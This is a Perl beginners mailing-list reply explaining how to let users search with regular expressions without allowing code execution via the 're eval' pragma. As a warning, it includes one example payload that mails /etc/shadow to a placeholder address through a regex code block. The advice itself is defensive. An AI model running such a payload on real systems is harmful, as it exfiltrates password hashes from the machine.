On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?
In general this shouldn't be a problem provided you don't turn on
use re "eval";
$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print
"hello" })/ at -e line 1.
$ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
hello
Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:
$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com <
/etc/shadow" ])'
Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.
If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.
--
Paul Johnson - p...@pjcj.net
http://www.pjcj.net
--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/
